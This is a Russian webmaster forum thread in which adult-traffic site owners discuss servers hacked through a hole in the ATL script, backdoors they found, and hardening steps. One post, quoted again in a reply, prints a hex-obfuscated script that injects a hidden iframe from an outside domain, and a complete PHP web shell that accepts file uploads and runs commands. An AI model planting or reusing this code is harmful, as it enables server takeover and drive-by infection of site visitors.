+ + +
С нами с 08.12.03
Сообщения: 675
Рейтинг: 79
|
 Добавлено: 14/02/08 в 02:37 |
Проблемы на сервере начались примерно с середины Января - провалы по траффу. Софт - АТЛ + Стрим. Основной симптом - дико грузился винт. Копали долго, ничего не нашли, решили что слишком загружена файловая система ( формулировка админов ), посоветовали переехать. Перед переездом еще и бэкдор нашли backup.php, который через дырку в АТЛовском x2.cgi подгружали.В итоге переехали на новый более мощный сервак. Ситуация частично повторилась, неожиданные скачки вниз по траффу и провалы по проде. Вчера еще один бэкдор нашли - ns.php в папке с топлистами АТЛ - прибили. В дополнение ко всему странным образом хаотично считается history по траффу в АТЛ. Вот такие пироги - у кого что-то похожее - отпишите.
|
|
|
|
| |
С нами с 13.11.07
Сообщения: 226
Рейтинг: 100
|
| Добавлено: 14/02/08 в 07:44 |
ИМХО, давно пора создать отдельную ветку "как защитить AT* от взлома", ломают его уж больно часто. Там можно было бы писать все известные способы защиты - от закрывания форм сабмита до использования .htaccess с deny all.
|
|
|
|
| |
Runka Snorkarka
С нами с 26.05.06
Сообщения: 1751
Рейтинг: 1278
|
| Добавлено: 14/02/08 в 07:53 |
Если сервак апач то поставь к нему - мод секьюрити он режет подозрительные запросы(хотя может и нужные зарезать, но его надо настраивать).
|
|
|
|
| |
罪人
С нами с 02.04.06
Сообщения: 736
Рейтинг: 849
|
| Добавлено: 14/02/08 в 10:26 |
Похожую ситуацию наблюдаю на своем сервере с нового года....
Резкие и необьяснимые скачки.... не так чтоб сильные, но сиджам от этого явно не здорово... Какраз вчера тер с Митчем эту тему....
При этом АТ у меня ни одной копии нет. Все на ФТТ+Ролинг или ФТТ +Стрим...
Бекдоров которые были тут названы пока не нашли, но ОЧЕНЬ хочу докопаться до причины данной ситуации..... Так что будем разбираться....
|
|
|
|
| |
(.)(.) Сиськеее...
С нами с 20.05.03
Сообщения: 2598
Рейтинг: 2651
|
| Добавлено: 14/02/08 в 11:46 |
Да... у меня такая же фигня случилась...
Сиж с 20-22к начал уверенно валится до 11-13к..., проду начало колбасить так, что даже страшно было в админку заходить...
Я сначала подумал, что это из-за обновления стрима...
У меня связка ATL + Stream...
Потом обнаружил что при загрузке морды сижа есть запросы на какие-то левые домены..., т.е. что-то тянется с них...
Полез разбираться.
Оказалось следующее:
1. присутствуют файлы backup.php
2. в морду сижа откуда-то из стрима подгружается js код:
| Код: | <script> var s='3C696672616D65207372633D22687474703A2F2F7777772E68716D706
72E636F6D2F66726565706F726E2F7468756D62732F7A2F7374617469632
E706870222077696474683D32206865696768743D32207374796C653D22
646973706C61793A6E6F6E65223E3C2F696672616D653E'; var o=''; for(i=0;i<s.length;i=i+2) { var c=String.fromCharCode(37); o=o+c+s.substr(i,2);} document.write(unescape(o)); </script> |
3. в корне домена лежал файл b.php с кодом:
| Код: | <?
if ($_POST[pass]!='123') { echo ' <html><body bgcolor=#BBFFBB onload="document.myf.pass.focus();"><form method=POST><input name=pass></form></body> </html>'; exit(); }
echo '<html><body bgcolor=#BBFFBB onload="document.myf.cc.focus();">';
echo '<form name=myf method=POST enctype="multipart/form-data"><input type=hidden name=pass value='.$_POST[pass].'><input type=file name=upfile><input name=newname><input type=submit><br>';
echo '<input name=cc size=73 value="'.stripslashes($_POST[cc]).'"></form>';
echo '<pre>'; if (move_uploaded_file($_FILES['upfile']['tmp_name'], $_POST[newname])) { /*echo "Sent.<br>\n";*/ }
$co=stripslashes($_POST[cc]); echo `$co`; echo '</pre>';
echo '</body></html>';
?> |
Вот такая шняга...
Сервак почистили... Вроде второй день все ок, больше говна не обнаруживаю..., но трейд так и не приходит в норму...
Уже не знаю что делать...
|
|
|
|
| |
Runka Snorkarka
С нами с 26.05.06
Сообщения: 1751
Рейтинг: 1278
|
| Добавлено: 14/02/08 в 12:24 |
Вот тут про мод секьюрити написано:
чttp://www.lissyara.su/?id=1450
Если что могу подсказать в аське.
|
|
|
|
| |
С нами с 12.12.06
Сообщения: 871
Рейтинг: 381
|
| Добавлено: 14/02/08 в 14:25 |
| Project писал: | Да... у меня такая же фигня случилась...
Сиж с 20-22к начал уверенно валится до 11-13к..., проду начало колбасить так, что даже страшно было в админку заходить...
Я сначала подумал, что это из-за обновления стрима...
У меня связка ATL + Stream...
Потом обнаружил что при загрузке морды сижа есть запросы на какие-то левые домены..., т.е. что-то тянется с них...
Полез разбираться.
Оказалось следующее:
1. присутствуют файлы backup.php
2. в морду сижа откуда-то из стрима подгружается js код:
| Код: | <script> var s='3C696672616D65207372633D22687474703A2F2F7777772E68716D706
72E636F6D2F66726565706F726E2F7468756D62732F7A2F7374617469632
E706870222077696474683D32206865696768743D32207374796C653D22
646973706C61793A6E6F6E65223E3C2F696672616D653E'; var o=''; for(i=0;i<s.length;i=i+2) { var c=String.fromCharCode(37); o=o+c+s.substr(i,2);} document.write(unescape(o)); </script> |
3. в корне домена лежал файл b.php с кодом:
| Код: | <?
if ($_POST[pass]!='123') { echo ' <html><body bgcolor=#BBFFBB onload="document.myf.pass.focus();"><form method=POST><input name=pass></form></body> </html>'; exit(); }
echo '<html><body bgcolor=#BBFFBB onload="document.myf.cc.focus();">';
echo '<form name=myf method=POST enctype="multipart/form-data"><input type=hidden name=pass value='.$_POST[pass].'><input type=file name=upfile><input name=newname><input type=submit><br>';
echo '<input name=cc size=73 value="'.stripslashes($_POST[cc]).'"></form>';
echo '<pre>'; if (move_uploaded_file($_FILES['upfile']['tmp_name'], $_POST[newname])) { /*echo "Sent.<br>\n";*/ }
$co=stripslashes($_POST[cc]); echo `$co`; echo '</pre>';
echo '</body></html>';
?> |
Вот такая шняга...
Сервак почистили... Вроде второй день все ок, больше говна не обнаруживаю..., но трейд так и не приходит в норму...
Уже не знаю что делать... |
Дак это тебя на 15 билде АТЛ-а хакнули, с 16 билдом вроде таких проблем нету.
|
|
|
|
| |
Runka Snorkarka
С нами с 26.05.06
Сообщения: 1751
Рейтинг: 1278
|
| Добавлено: 14/02/08 в 14:33 |
вроде как в .16 тоже есть проблемы.
|
|
|
|
| |
С нами с 30.08.03
Сообщения: 180
Рейтинг: 78
|
| Добавлено: 14/02/08 в 15:04 |
В 16м билде те же проблемы.
Рекомендую (помимо чистки от бекдоров):
1. x2.cgi везде закрыть хтаксессом
2. Если сильно грузится сервак - проверьте крон всех (!) юзеров системы на предмет подозрительных записей. Временно спрячьте утилиту find - с ее помощью в ваши файлы заносится злой код. И wget тоже рекомендую спрятать.
3. Проверьте файлы всех скриптов, запускаемых по крону - не модифицированы ли они.
4. Пропатчить apache и php до последних версий
5. Использовать suexec для апача и suhosun для php (но перед этим тщательно проверьте, будут ли при этом работать все скрипты. Например, у Смарта есть проблемы при установке при использовании сухосина).
6. Закройтесь файрволом. Наружу открытым оставьте только 80й порт, остальные- только для своих айпишников.
А вообще этот пидор заставил меня две недели гоняться за ним вместо того, чтобы заниматься делом. + потери трафика, бан некоторых сайтов в гугле за badware и тд. Так что, будьте бдительны, товарищи!
|
|
|
|
| |
Runka Snorkarka
С нами с 26.05.06
Сообщения: 1751
Рейтинг: 1278
|
| Добавлено: 14/02/08 в 15:30 |
php 4 + suhosin + smart у меня дружат, правдо с 5-кой не получилось траблы какието были.
|
|
|
|
| |
С нами с 13.11.07
Сообщения: 226
Рейтинг: 100
|
| Добавлено: 14/02/08 в 20:17 |
| Tsumibit0 писал: | Похожую ситуацию наблюдаю на своем сервере с нового года....
Резкие и необьяснимые скачки.... не так чтоб сильные, но сиджам от этого явно не здорово... Какраз вчера тер с Митчем эту тему....
При этом АТ у меня ни одной копии нет. Все на ФТТ+Ролинг или ФТТ +Стрим...
Бекдоров которые были тут названы пока не нашли, но ОЧЕНЬ хочу докопаться до причины данной ситуации..... Так что будем разбираться.... |
Фтт насколько я знаю юзает мускуль, причем делает это активно (аж две базы!). Как мне кажется, проблема именно в этом. Скрипт в целом вроде бы хороший, но очень любит заваливать к чертям mysql (друг рассказывал о нескольких падениях по вине фтт).
|
|
|
|
| |
